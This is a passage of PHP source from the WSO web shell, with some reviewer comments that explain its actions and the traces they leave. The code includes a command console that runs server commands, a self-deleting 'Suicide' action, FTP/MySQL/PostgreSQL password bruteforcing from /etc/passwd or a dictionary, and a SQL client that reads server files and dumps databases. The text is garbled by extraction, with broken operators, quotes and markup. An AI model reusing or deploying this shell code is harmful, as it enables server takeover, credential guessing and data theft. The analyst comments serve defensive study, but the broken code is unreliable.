echo strlen ($temp), \n, $temp;
exit;}
if (empty ($_POST ['ajax'])!empty ($_POST ['p1']))
WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', 0);
wsoHeader ();
echo script if (window.Event) window.captureEvents (Event.KEYDOWN);
var cmds = new Array ('');
var cur = 0;
function kp (e) {var n = (window.Event)? e.which: e.keyCode;
if (n == 38) {cur—;
if (cur>=0)
document.cf.cmd.value = cmds [cur];
else
cur++;} else if (n == 40) {cur++;
if (cur cmds.length)
document.cf.cmd.value = cmds [cur];
else
cur—;}}
function add (cmd) {cmds.pop ();
cmds.push (cmd);
cmds.push ('');
cur = cmds.length-1;}
";
echo '
Console
';
foreach ($GLOBALS ['aliases'] as $n => $v) {if ($v == '') {echo '';
continue;}
echo ''. $n. '';}
echo ' send using AJAX redirect stderr to stdout (2>&1)';
if (!empty ($_POST ['p1'])) {echo htmlspecialchars ("$ ". $_POST ['p1']. "\n".wsoEx ($_POST ['p1']));}
echo '$';
echo '
d.cf.cmd.focus ();';
wsoFooter ();}
// actionLogout: expires the auth cookie (named md5 of the Host header) by setting it empty
// with a timestamp one hour in the past, then ends the request with "bye!".
// NOTE(review): the "—" in "time () — 3600" is a minus sign converted by extraction.
function actionLogout () {setcookie (md5 ($_SERVER ['HTTP_HOST']), '', time () — 3600);
die ('bye!');}
// actionSelfRemove: when p1 is 'yes', deletes the script's own file: __FILE__ with any
// trailing "(N) ..." part removed by the regex, presumably the suffix PHP adds to the file
// name for eval()'d code. Otherwise it prints the confirmation page.
// Because the file can be removed after use, its absence from the web root does not rule out
// earlier activity; web-server access logs and file-system backups remain the evidence to
// check.
// NOTE(review): the regex and the confirmation markup are damaged by extraction.
function actionSelfRemove () {if ($_POST ['p1'] == 'yes')
if (@unlink (preg_replace ('!\ (\d+\)\s. *!', '', __FILE__)))
die ('Shell has been removed');
else
echo 'unlink error!';
if ($_POST ['p1']!= 'yes')
wsoHeader ();
echo ' h1 Suicide /h1 div class=content Really want to remove the shell? br a href=# onclick= g (null, null, \'yes\') Yes /a /div ';
wsoFooter ();}
// actionBruteforce: credential guessing against a network service, run from this host.
// The POST field proto (ftp, mysql or pgsql) selects which wsoBruteForce() is defined; each
// variant attempts a single login and returns the result. The field server is split on ":"
// into host and port, with 21 and 3306 as defaults for FTP and MySQL.
// type 1 reads /etc/passwd and tries each account name as its own password, and with
// "reverse" also the name spelled backwards; type 2 tries the login from the request against
// each line of a dictionary file whose path comes from the request. Attempts and successes
// are counted and printed.
// On the network this appears as rapid sequential login failures against FTP, MySQL or
// PostgreSQL with the web server as the source address, which such a host normally has no
// reason to produce.
// NOTE(review): "—$i" is "--$i" converted by extraction and the form markup at the end is
// stripped to its labels.
function actionBruteforce () {wsoHeader ();
if (isset ($_POST ['proto'])) {echo '
Results
Type: '.htmlspecialchars ($_POST ['proto']). ' Server: '.htmlspecialchars ($_POST ['server']). '';
if ($_POST ['proto'] == 'ftp') {function wsoBruteForce ($ip, $port, $login, $pass) {$fp = @ftp_connect ($ip, $port?$port:21);
if (!$fp) return false;
$res = @ftp_login ($fp, $login, $pass);
@ftp_close ($fp);
return $res;}} elseif ($_POST ['proto'] == 'mysql') {function wsoBruteForce ($ip, $port, $login, $pass) {$res = @mysql_connect ($ip. ':'. ($port?$port:3306), $login, $pass);
@mysql_close ($res);
return $res;}} elseif ($_POST ['proto'] == 'pgsql') {function wsoBruteForce ($ip, $port, $login, $pass) {$str = «host='». $ip. "' port='". $port. "' user='". $login. "' password='". $pass. "' dbname=postgres";
$res = @pg_connect ($str);
@pg_close ($res);
return $res;}}
$success = 0;
$attempts = 0;
$server = explode (":", $_POST ['server']);
if ($_POST ['type'] == 1) {$temp = @file ('/etc/passwd');
if (is_array ($temp))
foreach ($temp as $line) {$line = explode (":", $line);
++$attempts;
if (wsoBruteForce (@$server [0], @$server [1], $line [0], $line [0])) {$success++;
echo ''.htmlspecialchars ($line [0]). ':'.htmlspecialchars ($line [0]). '';}
if (@$_POST ['reverse']) {$tmp = "";
for ($i=strlen ($line [0])-1; $i>=0; —$i)
$tmp. = $line [0] [$i];
++$attempts;
if (wsoBruteForce (@$server [0], @$server [1], $line [0], $tmp)) {$success++;
echo ''.htmlspecialchars ($line [0]). ':'.htmlspecialchars ($tmp);}}}} elseif ($_POST ['type'] == 2) {$temp = @file ($_POST ['dict']);
if (is_array ($temp))
foreach ($temp as $line) {$line = trim ($line);
++$attempts;
if (wsoBruteForce ($server [0], @$server [1], $_POST ['login'], $line)) {$success++;
echo ''.htmlspecialchars ($_POST ['login']). ':'.htmlspecialchars ($line). '';}}}
echo «Attempts: $attempts Success: $success
»;}
echo '
Bruteforce
Type'. 'FTPMySqlPostgreSql'. ''. ''. ''. 'Server:port'. ''. 'Brute type'. ' /etc/passwd'. ' reverse (login -> nigol)'. ' Dictionary'. 'Login'. ''. 'Dictionary'. ''. '';
echo '
';
wsoFooter ();}
function actionSql () {class DbClass {var $type;
var $link;
var $res;
function DbClass ($type) {$this->type = $type;}
function connect ($host, $user, $pass, $dbname) {switch ($this->type) {case 'mysql'
if ($this->link = @mysql_connect ($host, $user, $pass, true)) return true;
break;
case 'pgsql'
$host = explode (':', $host);
if (!$host [1]) $host [1]=5432;
if ($this->link = @pg_connect ("host= {$host [0]} port= {$host [1]} user=$user password=$pass dbname=$dbname")) return true;
break;}
return false;}
function selectdb ($db) {switch ($this->type) {case 'mysql'
if (@mysql_select_db ($db)) return true;
break;}
return false;}
function query ($str) {switch ($this->type) {case 'mysql'
return $this->res = @mysql_query ($str);
break;
case 'pgsql'
return $this->res = @pg_query ($this->link, $str);
break;}
return false;}
function fetch () {$res = func_num_args ()?func_get_arg (0):$this->res;
switch ($this->type) {case 'mysql'
return @mysql_fetch_assoc ($res);
break;
case 'pgsql'
return @pg_fetch_assoc ($res);
break;}
return false;}
function listDbs () {switch ($this->type) {case 'mysql'
return $this->query ("SHOW databases");
break;
case 'pgsql'
return $this->res = $this->query ("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;}
return false;}
function listTables () {switch ($this->type) {case 'mysql'
return $this->res = $this->query ('SHOW TABLES');
break;
case 'pgsql'
return $this->res = $this->query ("select table_name from information_schema.tables where table_schema!= 'information_schema' AND table_schema!= 'pg_catalog'");
break;}
return false;}
function error () {switch ($this->type) {case 'mysql'
return @mysql_error ();
break;
case 'pgsql'
return @pg_last_error ();
break;}
return false;}
function setCharset ($str) {switch ($this->type) {case 'mysql'
if (function_exists ('mysql_set_charset'))
return @mysql_set_charset ($str, $this->link);
else
$this->query ('SET CHARSET '. $str);
break;
case 'pgsql'
return @pg_set_client_encoding ($this->link, $str);
break;}
return false;}
function loadFile ($str) {switch ($this->type) {case 'mysql'
return $this->fetch ($this->query ("SELECT LOAD_FILE ('".addslashes ($str). "') as file"));
break;
case 'pgsql'
$this->query ("CREATE TABLE wso2 (file text);COPY wso2 FROM '".addslashes ($str). "';select file from wso2;");
$r=array ();
while ($i=$this->fetch ())
$r [] = $i ['file'];
$this->query ('drop table wso2');
return array ('file'=>implode ("\n", $r));
break;}
return false;}
function dump ($table, $fp = false) {switch ($this->type) {case 'mysql'
$res = $this->query ('SHOW CREATE TABLE '. $table. '');
$create = mysql_fetch_array ($res);
$sql = $create [1]. ";\n";
if ($fp) fwrite ($fp, $sql); else echo ($sql);
$this->query ('SELECT * FROM '. $table. '');
$i = 0;
$head = true;
while ($item = $this->fetch ()) {$sql = '';
if ($i % 1000 == 0) {$head = true;
$sql = ";\n\n";}
$columns = array ();
foreach ($item as $k= $v) {if ($v === null)
$item [$k] = NULL;
elseif (is_int ($v))
$item [$k] = $v;
else
$item [$k] = '. @mysql_real_escape_string ($v). ';
$columns [] = `. $k. `;}
if ($head) {$sql. = 'INSERT INTO `'. $table. '` ('.implode (, , $columns).) VALUES \n\t (.implode (, , $item). ')';
$head = false;} else
$sql. = \n\t, (.implode (, , $item). ')';
if ($fp) fwrite ($fp, $sql); else echo ($sql);
$i++;}
if (!$head)
if ($fp) fwrite ($fp,;\n\n); else echo (;\n\n);
break;
case 'pgsql'
$this— query ('SELECT * FROM '. $table);
while ($item = $this— fetch ()) {$columns = array ();
foreach ($item as $k= $v) {$item [$k] = '.addslashes ($v). ';
$columns [] = $k;}
$sql = 'INSERT INTO '. $table. ' ('.implode (, , $columns). ') VALUES ('.implode (, , $item). ');'. \n;
if ($fp) fwrite ($fp, $sql); else echo ($sql);}
break;}
return false;}};
$db = new DbClass ($_POST ['type']);
if ((@$_POST ['p2']=='download') (@$_POST ['p1']!='select')) {$db— connect ($_POST ['sql_host'], $_POST ['sql_login'], $_POST ['sql_pass'], $_POST ['sql_base']);
$db— selectdb ($_POST ['sql_base']);
switch ($_POST ['charset']) {case Windows-1251: $db— setCharset ('cp1251'); break;
case UTF-8: $db— setCharset ('utf8'); break;
case KOI8-R: $db— setCharset ('koi8r'); break;
case KOI8-U: $db— setCharset ('koi8u'); break;
case cp866: $db— setCharset ('cp866'); break;}
if (empty ($_POST ['file'])) {ob_start (ob_gzhandler, 4096);
header (Content-Disposition: attachment; filename=dump.sql);
header (Content-Type: text/plain);
foreach ($_POST ['tbl'] as $v)
$db— dump ($v);
exit;} elseif ($fp = @fopen ($_POST ['file'], 'w')) {foreach ($_POST ['tbl'] as $v)
$db— dum